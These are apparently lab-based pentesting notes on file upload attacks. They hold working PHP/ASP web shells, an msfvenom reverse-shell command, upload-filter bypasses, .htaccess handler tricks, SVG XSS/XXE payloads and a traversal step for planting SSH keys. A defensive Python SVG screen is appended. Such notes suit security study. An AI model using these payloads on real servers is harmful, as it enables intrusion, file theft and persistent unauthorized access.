- When testing a file upload form, always check what happens when the same file is uploaded *twice*. If the application reports that the *file already exists*, that response is an oracle: by uploading files with guessed names we can brute-force which files are already present on the web server.
- If the application instead returns an error message, the message may leak useful information such as the *programming language* or *web technologies* in use (stack traces, framework names, absolute paths).

# Web Shells

```bash
# Trigger an uploaded PHP webshell (path from the lab; adjust to the target's upload directory)
curl "http://$IP/wook/uploads/simple-backdoor.php?cmd=dir"

# Basic PHP file read
<?php echo file_get_contents('/etc/passwd'); ?>

# Basic PHP command execution
<?php system('hostname'); ?>

# Basic PHP webshell (command comes from the GET or POST parameter "cmd")
<?php system($_REQUEST['cmd']); ?>

# Basic ASP webshell
<% eval request('cmd') %>

# Generate a PHP reverse shell
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > reverse.php

# phpbash (semi-interactive webshell)
https://github.com/Arrexel/phpbash

# pentestmonkey PHP reverse shell
https://github.com/pentestmonkey/php-reverse-shell

# SecLists web shells / reverse shells
https://github.com/danielmiessler/SecLists/tree/master/Web-Shells
```

# Bypasses

```bash
# Client-side bypass: the check runs in the browser only. Disable/edit the JavaScript
# validation in the Page Inspector (DevTools), or intercept the request in a proxy and
# change the filename/contents after the client-side check has already passed.

# Blacklist bypass: alternative extensions the server may still execute
.phps .phtml .pHp .pHP .php7 .phar etc.

# PHP extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

# ASP extensions
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP

# Web extensions
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt

# Whitelist bypass
## Double extension: passes a weak regex that only looks for ".jpg" *somewhere* in the name
shell.jpg.php
## Reverse double extension: relies on a misconfigured server that executes .php wherever it appears in the name
shell.php.jpg

# Character injection: characters that may truncate or confuse the extension check
# %20, %0a, %00, %0d0a, /, .\, ., …, :
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

# Content-Type bypass: set the Content-Type header of the file part to an allowed image type
## List of all content types
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt
grep 'image/' web-all-content-types.txt > image-content-types.txt

# File signatures / magic bytes: prepend an allowed signature (e.g. GIF89a) to the payload
https://en.wikipedia.org/wiki/List_of_file_signatures
```

# .htaccess

```bash
# Upload a .htaccess into the uploads directory so Apache interprets .jpg files as PHP.
# Only works when AllowOverride (FileInfo) permits .htaccess in that directory.
AddType application/x-httpd-php .jpg .jpeg .png
# or
AddHandler application/x-httpd-php .jpg .php .phtml
# or
<FilesMatch "\.(jpg|jpeg|png)$">
    SetHandler application/x-httpd-php
</FilesMatch>
```

# Limited Uploads

```bash
# Even when the upload cannot execute code, some file types are still dangerous
XSS      - HTML, JS, SVG, GIF
XXE/SSRF - XML, SVG, PDF, PPT, DOC
DoS      - ZIP, JPG, PNG (zip bombs, decompression/pixel-flood images)

# payload 1: stored XSS via a <script> element inside an SVG
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

# payload 2: XXE reading a local file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

# payload 3: XXE reading PHP source via php://filter (base64 so the PHP tags do not break the XML)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```

# Upload + Directory traversal

Inject traversal sequences (`../`) into the uploaded filename so the file is written outside the upload directory, e.g. into a location that is executed or into a user's `.ssh` directory.

![[Pasted image 20251202215758.png]]
![[Pasted image 20251202215801.png]]

# File Upload private key

Generate a key pair, write the *public* key into an `authorized_keys` file, and upload that file (via the traversal above) into the target user's `.ssh` directory. The private key (`fileup`) stays local and is then used to log in with `ssh -i fileup <user>@<target>`.

```
kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in fileup
Your public key has been saved in fileup.pub
...
kali@kali:~$ cat fileup.pub > authorized_keys
```

![[Pasted image 20251202222118.png]]
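The Limited Uploads section shows what a malicious SVG looks like from the attacker's side. The following added example, not part of the original notes, is the defender's counterpart: a standard-library Python screen for uploaded SVGs that rejects any DOCTYPE before an XML parser ever sees the entity declarations (which stops payloads 2 and 3), and walks the parsed tree for script elements, `on*` event handlers and `javascript:`/`data:` hrefs. The three payloads from the notes plus one DOCTYPE-less XSS sample and one benign file are embedded as constructed test inputs; the function name `svg_findings` is my own.

```python
"""Screen uploaded SVGs for the XXE and XSS payloads from the Limited Uploads section
(added example; standard library only)."""
import re
import xml.etree.ElementTree as ET

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.I)
ENTITY_RE = re.compile(rb"<!ENTITY\s+\S+\s+(SYSTEM|PUBLIC)", re.I)
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}


def svg_findings(data: bytes):
    """Return the reasons an uploaded SVG should be rejected; an empty list means clean.
    Any DOCTYPE is refused outright and the document is *not* parsed afterwards, so
    entity declarations never reach a parser that might resolve them."""
    findings = []
    if DOCTYPE_RE.search(data):
        findings.append("doctype")
        if ENTITY_RE.search(data):
            findings.append("external-entity")
        return findings
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["malformed-xml"]
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()      # strip the namespace
        if local in DANGEROUS_ELEMENTS:
            findings.append(f"element:{local}")
        for attr, value in el.attrib.items():
            aname = attr.rsplit("}", 1)[-1].lower()     # xlink:href -> href
            if aname.startswith("on"):
                findings.append(f"event-handler:{aname}")
            if aname == "href" and value.strip().lower().startswith(("javascript:", "data:")):
                findings.append("href:" + value.strip().split(":", 1)[0].lower())
    return findings


# --- constructed samples: the notes' three payloads plus two extra inputs -------------
PAYLOAD_1_XSS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>"""
PAYLOAD_2_XXE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>"""
PAYLOAD_3_XXE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>"""
# XSS variant without a DOCTYPE, so it exercises the tree walk rather than the DOCTYPE rule
XSS_NO_DOCTYPE = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
    <script>alert(document.domain)</script>
</svg>"""
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
    <rect x="0" y="0" width="1" height="1" fill="green" />
</svg>"""

if __name__ == "__main__":
    for label, sample in [("payload 1", PAYLOAD_1_XSS), ("payload 2", PAYLOAD_2_XXE),
                          ("payload 3", PAYLOAD_3_XXE), ("xss-no-doctype", XSS_NO_DOCTYPE),
                          ("benign", BENIGN)]:
        print(f"{label:15} -> {svg_findings(sample) or 'clean'}")
```

Note that payload 1 is caught by the DOCTYPE rule alone (its DTD reference is a DOCTYPE even though it declares no entity), which is why the DOCTYPE-less sample is needed to show the script and event-handler detection. Rejecting is a screening step, not a substitute for serving uploads from a separate origin with `Content-Disposition: attachment` or rasterising SVGs server-side.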